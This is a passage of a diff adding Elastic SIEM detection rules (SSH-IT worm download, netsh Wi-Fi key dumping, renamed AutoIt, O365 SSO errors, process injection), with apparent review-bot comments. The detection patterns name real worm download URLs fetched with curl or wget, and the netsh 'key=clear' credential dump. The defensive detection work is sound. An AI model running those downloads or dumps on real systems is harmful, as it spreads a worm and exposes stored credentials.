Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "references": [ + "https://twitter.com/SBousseaden/status/1278013896440324096", + "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 211 + }, + "id": "2dd480be-1263-4d9c-8672-172928f6789a_211", + "type": "security-rule" +} \ No newline at end of file 
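Review bot: Several items in `note` do not belong to this rule and read as carried over from a certificate-tampering guide: the false-positive paragraph discusses applications that install root certificates to inspect SSL traffic, the remediation list contains `Remove the malicious certificate from the root certificate store.`, and an investigation step refers to login events "after the registry modification", while the `query` matches Sysmon `event.code == "10"` (process access) with a `CallTrace` that does not start in ntdll and touches neither certificates nor registry keys. An analyst following the guide as written will look for the wrong artifacts. Replace those sentences with ones about the process-access event, for example `- Review the source process and the target it accessed in the Sysmon event; a CallTrace that does not begin in ntdll.dll means the access did not pass through the API layer that security tools normally hook.`, and drop the certificate-removal step. If this file is a synced export from the rule source, the fix belongs upstream or it will be overwritten on the next sync.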
diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json new file mode 100644 index 00000000000..6908eef25f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential SSH-IT SSH Worm Downloaded", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"curl\", \"wget\") and process.args : (\n \"https://thc.org/ssh-it/x\", \"http://nossl.segfault.net/ssh-it-deploy.sh\", \"https://gsocket.io/x\",\n \"https://thc.org/ssh-it/bs\", \"http://nossl.segfault.net/bs\"\n)\n", + "references": [ + "https://www.thc.org/ssh-it/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2ddc468e-b39b-4f5b-9825-f3dcb0e998ea", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_3", + "type": "security-rule" +} \ No newline at end of file 
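Review bot: The `process.args` clause in `query` matches five exact URL strings, so any variant of the same download (a different scheme, a trailing slash, a redirect target) falls outside the rule even though the `:` operator supports wildcard patterns, as the `"AutoIt*.exe"` rules later in this diff show. Anchoring on the distinctive path components instead, e.g. `process.args : ("*thc.org/ssh-it/*", "*segfault.net/ssh-it-deploy.sh", "*gsocket.io/x")`, would keep detection across trivial URL variations; the exact list can remain if the broader patterns prove noisy. This file also carries no `note` investigation guide while the neighbouring rules do; if that is deliberate for a `medium` rule it is fine, otherwise a short triage section pointing analysts at the parent process and the fetched file would help.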
diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json new file mode 100644 index 00000000000..a36767fd835 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_104.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": 
"event.ingested", + "type": "threshold", + "version": 104 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json new file mode 100644 index 00000000000..071b9f4335c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_106.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": 
"event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json new file mode 100644 index 00000000000..b7f295cec18 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_207.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-20m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Excessive Single Sign-On Logon Errors", + "note": "", + "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.LogonError", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "user.id" + ], + "value": 5 + }, + "timestamp_override": 
"event.ingested", + "type": "threshold", + "version": 207 + }, + "id": "2de10e77-c144-4e69-afb7-344e7127abd0_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json new file mode 100644 index 00000000000..e5f906bc219 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_8.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to dump Wireless saved access keys in clear text using the Windows built-in utility Netsh.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Wireless Credential Dumping using Netsh Command", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or ?process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", + "references": [ + "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", + "https://www.geeksforgeeks.org/how-to-find-the-wi-fi-password-using-cmd-in-windows/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2de87d72-ee0c-43e2-b975-5f0b029ac600", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "2de87d72-ee0c-43e2-b975-5f0b029ac600_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json new file mode 100644 index 00000000000..f9899117052 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed AutoIt Scripts Interpreter", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": 
"https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json new file mode 100644 index 00000000000..67c688a1e30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_110.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed AutoIt Scripts Interpreter", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 